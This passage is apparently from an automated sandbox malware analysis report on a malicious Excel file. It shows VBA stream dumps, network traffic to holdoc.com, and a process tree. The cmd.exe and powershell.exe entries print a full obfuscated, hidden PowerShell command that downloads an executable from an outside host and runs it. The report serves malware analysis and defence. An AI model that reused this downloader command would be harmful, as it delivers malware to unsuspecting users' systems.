Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 548

General Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2 File Type: data Stream Size: 548 Entropy: 2.31128093652 Base64 Encoded: False Data ASCII: r U ...... 0 ...... + . 4 . . . 1 ...... a ...... Y ...... ` ...... Data Raw: 72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 b9 05 00 00 00 00 00 00 e1 05 00 00 00 00 00 00 09 06 00 00 00 00 00 00 ff ff ff ff 91 05 00 00 00 00 00 00 08 00 2b 00 34 00 00 00 31 06 00 00 00 00 00 00 61 00 00 00 00 00 01 00 59 06

Copyright Joe Security LLC 2018 Page 18 of 23 Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 481

General Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3 File Type: data Stream Size: 481 Entropy: 2.76254679194 Base64 Encoded: False Data ASCII: r U ...... @ . . . . . $ ...... ` ...... ( . A ...... ` ...... / ( ...... ` ...... / ( ...... ` . . ! ...... / ( ...... ` . . % ...... Data Raw: 72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 24 00 01 01 00 00 00 00 02 00 00 00 03 60 00 00 15 04 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 28 00 41 01 00 00 00 00 02 00 01 00 03 60 04 01 19 04 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 524

General Stream Path: _VBA_PROJECT_CUR/VBA/dir File Type: data Stream Size: 524 Entropy: 6.33160018738 Base64 Encoded: True Data ASCII: ...... 0 * . . . . . p . . H . . . . . d ...... V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r ...... * . c \\ . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C ...... 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E ...... E . 2 D F 8 D 0 4 C . - Data Raw: 01 08 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 2a e1 63 5c 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Network Port Distribution

Total Packets: 14 • 80 (HTTP) • 53 (DNS)

TCP Packets

Timestamp Source Port Dest Port Source IP Dest IP Feb 23, 2018 01:31:46.217499971 CET 56842 53 192.168.2.2 8.8.8.8 Feb 23, 2018 01:31:47.213018894 CET 56842 53 192.168.2.2 8.8.8.8 Feb 23, 2018 01:31:47.299452066 CET 53 56842 8.8.8.8 192.168.2.2 Feb 23, 2018 01:31:47.321384907 CET 49163 80 192.168.2.2 92.53.78.250 Feb 23, 2018 01:31:47.321408033 CET 80 49163 92.53.78.250 192.168.2.2 Feb 23, 2018 01:31:47.321466923 CET 49163 80 192.168.2.2 92.53.78.250

Copyright Joe Security LLC 2018 Page 19 of 23 Timestamp Source Port Dest Port Source IP Dest IP Feb 23, 2018 01:31:47.321856976 CET 49163 80 192.168.2.2 92.53.78.250 Feb 23, 2018 01:31:47.321868896 CET 80 49163 92.53.78.250 192.168.2.2 Feb 23, 2018 01:31:47.851967096 CET 53 56842 8.8.8.8 192.168.2.2 Feb 23, 2018 01:33:26.202478886 CET 49163 80 192.168.2.2 92.53.78.250 Feb 23, 2018 01:33:26.202632904 CET 80 49163 92.53.78.250 192.168.2.2 Feb 23, 2018 01:33:26.202733040 CET 49163 80 192.168.2.2 92.53.78.250 Feb 23, 2018 01:33:26.562745094 CET 53440 53 192.168.2.2 8.8.8.8 Feb 23, 2018 01:33:26.652406931 CET 53 53440 8.8.8.8 192.168.2.2 Feb 23, 2018 01:33:26.654766083 CET 49164 80 192.168.2.2 92.53.78.250 Feb 23, 2018 01:33:26.654820919 CET 80 49164 92.53.78.250 192.168.2.2 Feb 23, 2018 01:33:26.655200005 CET 49164 80 192.168.2.2 92.53.78.250 Feb 23, 2018 01:33:26.655917883 CET 49164 80 192.168.2.2 92.53.78.250 Feb 23, 2018 01:33:26.655945063 CET 80 49164 92.53.78.250 192.168.2.2

UDP Packets

Timestamp Source Port Dest Port Source IP Dest IP Feb 23, 2018 01:31:46.217499971 CET 56842 53 192.168.2.2 8.8.8.8 Feb 23, 2018 01:31:47.213018894 CET 56842 53 192.168.2.2 8.8.8.8 Feb 23, 2018 01:31:47.299452066 CET 53 56842 8.8.8.8 192.168.2.2 Feb 23, 2018 01:31:47.851967096 CET 53 56842 8.8.8.8 192.168.2.2 Feb 23, 2018 01:33:26.562745094 CET 53440 53 192.168.2.2 8.8.8.8 Feb 23, 2018 01:33:26.652406931 CET 53 53440 8.8.8.8 192.168.2.2

ICMP Packets

Timestamp Source IP Dest IP Checksum Code Type Feb 23, 2018 01:31:47.852212906 CET 192.168.2.2 8.8.8.8 cffc (Port Destination unreachable) Unreachable

DNS Queries

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Feb 23, 2018 01:31:46.217499971 CET 192.168.2.2 8.8.8.8 0x2320 Standard query holdoc.com A (IP address) IN (0x0001) (0) Feb 23, 2018 01:31:47.213018894 CET 192.168.2.2 8.8.8.8 0x2320 Standard query holdoc.com A (IP address) IN (0x0001) (0) Feb 23, 2018 01:33:26.562745094 CET 192.168.2.2 8.8.8.8 0x61b2 Standard query holdoc.com A (IP address) IN (0x0001) (0)

DNS Answers

Timestamp Source IP Dest IP Trans ID Replay Code Name CName Address Type Class Feb 23, 2018 8.8.8.8 192.168.2.2 0x2320 No error (0) holdoc.com 92.53.78.250 A (IP address) IN (0x0001) 01:31:47.299452066 CET Feb 23, 2018 8.8.8.8 192.168.2.2 0x2320 No error (0) holdoc.com 92.53.78.250 A (IP address) IN (0x0001) 01:31:47.851967096 CET Feb 23, 2018 8.8.8.8 192.168.2.2 0x61b2 No error (0) holdoc.com 92.53.78.250 A (IP address) IN (0x0001) 01:33:26.652406931 CET

HTTP Request Dependency Graph

holdoc.com

HTTP Packets

Session ID Source IP Source Port Destination IP Destination Port Process 0 192.168.2.2 49163 92.53.78.250 80 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

kBytes Timestamp transferred Direction Data Feb 23, 2018 0 OUT GET /lantrace HTTP/1.1 01:31:47.321856976 CET Host: holdoc.com Connection: Keep-Alive

Copyright Joe Security LLC 2018 Page 20 of 23 Session ID Source IP Source Port Destination IP Destination Port Process 1 192.168.2.2 49164 92.53.78.250 80 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

kBytes Timestamp transferred Direction Data Feb 23, 2018 1 OUT GET /lantrace HTTP/1.1 01:33:26.655917883 CET Host: holdoc.com Connection: Keep-Alive

Code Manipulations

Statistics

Behavior

• EXCEL.EXE • cmd.exe • powershell.exe

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 3268 Parent PID: 2948

General

Start time: 01:31:48 Start date: 23/02/2018 Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Wow64 process (32bit): false Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde Imagebase: 0x2f310000 File size: 20392608 bytes MD5 hash: 716335EDBB91DA84FC102425BFDA957E Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

File Activities

Source File Path Completion Count Address Symbol

Source Old File Path New File Path Completion Count Address Symbol

Source File Path Offset Length Value Ascii Completion Count Address Symbol

Registry Activities

Key Created

Source Key Path Completion Count Address Symbol HKEY_USERS\Software\Microsoft\VBA success or wait 1 60A4AC61 RegCreateKeyExA HKEY_USERS\Software\Microsoft\VBA\7.0 success or wait 1 60A4AC61 RegCreateKeyExA HKEY_USERS\Software\Microsoft\VBA\7.0\Common success or wait 1 60A4AC61 RegCreateKeyExA

Source Key Path Name Type Data Completion Count Address Symbol

Source Key Path Name Type Old Data New Data Completion Count Address Symbol

Analysis Process: cmd.exe PID: 3348 Parent PID: 3268

General

Start time: 01:31:51 Start date: 23/02/2018 Path: C:\Windows\System32\cmd.exe Wow64 process (32bit): false Commandline: cMd /c'poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'd o{sleep 25;(.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0}{2}{4}\' -f't','syst','.webclie','em','nt','. ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://holdoc.com/lantrace','%temp%.exe')}while(!$?);&(\'{0} {2}{1}\'-f'star','ss','t-proce') '%localappdata%.exe''' Imagebase: 0x49de0000 File size: 302592 bytes MD5 hash: AD7B9C14083B52BC532FBA5948342B98 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Analysis Process: powershell.exe PID: 3376 Parent PID: 3348

General

Start time: 01:31:52 Start date: 23/02/2018 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Commandline: poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'do{sleep 25; (.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0}{2}{4}\' -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'n loadfil'+'e').Invoke('http://holdoc.com/lantrace','C:\Users\HERBBL~1\AppData\Local\Temp.ex e')}while(!$?);&(\'{0}{2}{1}\'-f'star','ss','t-proce') 'C:\Users\user\AppData\Local.exe'' Imagebase: 0x22820000 File size: 452608 bytes MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: moderate

File Created

Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\AppData\Local\Temp.exe read attributes none synchronous io success or wait 1 181066F CreateFileW and synchronize non alert and n and generic on directory file write and open no recall C:\Users\user\AppData\Local\Temp.exe read attributes none synchronous io success or wait 1 181066F CreateFileW and synchronize non alert and n and generic on directory file write and open no recall

File Deleted

Source File Path Completion Count Address Symbol C:\Users\user\AppData\Local\Temp.exe success or wait 1 181006E DeleteFileW

Source Old File Path New File Path Completion Count Address Symbol

Source File Path Offset Length Value Ascii Completion Count Address Symbol

Registry Activities

Source Key Path Completion Count Address Symbol

Source Key Path Name Type Data Completion Count Address Symbol

Disassembly

Code Analysis